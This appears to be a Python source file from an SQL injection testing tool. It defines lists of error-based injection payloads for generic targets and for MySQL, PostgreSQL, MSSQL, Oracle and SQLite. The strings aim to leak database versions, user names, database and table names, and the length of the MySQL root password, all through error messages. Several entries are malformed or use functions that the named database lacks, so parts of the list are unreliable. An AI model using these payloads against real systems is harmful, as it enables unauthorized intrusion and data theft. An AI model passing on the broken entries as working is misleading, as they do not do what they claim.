ERROR_PAYLOADS = [
    "' AND EXTRACTVALUE(1,CONCAT(0x7e,VERSION()))--",
    "' AND UPDATEXML(1,CONCAT(0x7e,VERSION()),1)--",
    "' AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT((SELECT VERSION()),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)--",
    "' AND (SELECT COUNT(*) FROM (SELECT 1 UNION SELECT 2 UNION SELECT 3)x GROUP BY CONCAT((SELECT VERSION()),FLOOR(RAND(0)*2)))--",
    "' UNION SELECT 1,2,3 FROM (SELECT 1 UNION SELECT 2 UNION SELECT 3)x WHERE 1=1 AND 1=EXTRACTVALUE(1,CONCAT(0x7e,VERSION()))--",
    "1' AND EXTRACTVALUE(1,CONCAT(0x7e,USER()))--",
    "1' AND UPDATEXML(1,CONCAT(0x7e,USER()),1)--",
    "1' AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT((SELECT USER()),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)--",
    "' AND 1=CTXSYS.DRITHSX.SN(user,(SELECT USER FROM DUAL))--",
    "' AND 1=UTL_INADDR.GET_HOST_NAME((SELECT USER FROM DUAL))--",
    "1' AND 1=DBMS_UTILITY.SQLID_TO_SQLHASH((SELECT USER FROM DUAL))--",
    "1' AND 1=ORACLE XTYPE IN ('char') AND '1'='1",
    "' AND (SELECT UTL_INADDR.GET_HOST_ADDRESS FROM DUAL WHERE 1=1 AND 1=EXTRACTVALUE(1,CONCAT(0x7e,VERSION())))>0--",
    "' OR 1=EXTRACTVALUE(1,CONCAT(0x7e,VERSION()))--",
    "' AND EXTRACTVALUE(1,CONCAT(0x7e,database()))--",
    "' AND UPDATEXML(1,CONCAT(0x7e,database()),1)--",
    "' AND 1=(SELECT 1 FROM (SELECT COUNT(*),CONCAT((SELECT database()),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)--",
    "1 AND 1=1 AND EXTRACTVALUE(1,CONCAT(0x7e,VERSION()))",
    "1 AND 1=2 AND EXTRACTVALUE(1,CONCAT(0x7e,VERSION()))",
]

ERROR_PAYLOADS_MYSQL = [
    "' AND ELT(1=1,VERSION())--",
    "' AND JSON_KEYS((SELECT CONVERT((SELECT USER()) USING JSON)))--",
    "1' AND ROW(1,1)>(SELECT COUNT(*),CONCAT((SELECT VERSION()),0x7e,FLOOR(RAND(0)*2))x FROM mysql.user GROUP BY x)--",
    "1' AND (SELECT 2 FROM (SELECT COUNT(*) AS c FROM information_schema.tables GROUP BY c HAVING c=1) AS x)--",
    "' AND MAKE_SET(1=1,VERSION())--",
    "' AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT((SELECT table_name FROM information_schema.tables LIMIT 1),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)--",
    "1' AND (SELECT COUNT(*) FROM mysql.user)>0--",
    "1' AND (SELECT LENGTH(password) FROM mysql.user WHERE user='root')>0--",
]

ERROR_PAYLOADS_POSTGRESQL = [
    "1' AND 1=CAST((SELECT VERSION()) AS INT)--",
    "1' AND 1=CAST((SELECT current_user) AS INT)--",
    "1' AND 1=CAST((SELECT datname FROM pg_database LIMIT 1) AS INT)--",
    "1' AND 1=CAST((SELECT relname FROM pg_class LIMIT 1) AS INT)--",
    "1'; SELECT CAST(VERSION() AS INT)--",
    "1'; SELECT CAST(CURRENT_USER AS INT)--",
    "1'; SELECT 1/CAST((SELECT 1) AS INT)--",
    "1' AND 1=(SELECT COUNT(*) FROM pg_user)>0--",
]

ERROR_PAYLOADS_MSSQL = [
    "1' AND 1=CONVERT(INT,(SELECT VERSION()))--",
    "1' AND 1=CONVERT(INT,(SELECT USER_NAME()))--",
    "1' AND 1=CONVERT(INT,(SELECT DB_NAME()))--",
    "1' AND 1=CONVERT(INT,(SELECT TOP 1 name FROM sys.databases))--",
    "1'; SELECT CAST(@@VERSION AS INT)--",
    "1'; SELECT 1/CAST((SELECT 1) AS INT)--",
    "1' AND 1=CONVERT(INT,(SELECT COUNT(*) FROM sys.databases))--",
    "1' AND 1=CONVERT(INT,(SELECT LEN(DB_NAME())))--",
]

ERROR_PAYLOADS_ORACLE = [
    "1' AND 1=CTXSYS.DRITHSX.SN(user,(SELECT USER FROM DUAL))--",
    "1' AND 1=ORACLE XTYPE IN ('char') AND '1'='1",
    "1' AND (SELECT UTL_INADDR.GET_HOST_ADDRESS FROM DUAL) IS NOT NULL--",
    "1' AND (SELECT DBMS_UTILITY.SQLID_TO_SQLHASH((SELECT USER FROM DUAL)) FROM DUAL) IS NOT NULL--",
    "1' AND (SELECT RAWTOHEX(DBMS_RANDOM.STRING('X',10)) FROM DUAL) IS NOT NULL--",
]

ERROR_PAYLOADS_SQLITE = [
    "1' AND 1=CAST((SELECT sqlite_version()) AS INT)--",
    "1' AND 1=CAST((SELECT SQLITE_VERSION()) AS INT)--",
    "1'; SELECT CAST(sqlite_version() AS INT)--",
    "1'; SELECT 1/CAST((SELECT 1) AS INTEGER)--",
    "1' AND (SELECT COUNT(*) FROM sqlite_master)>0--",
]
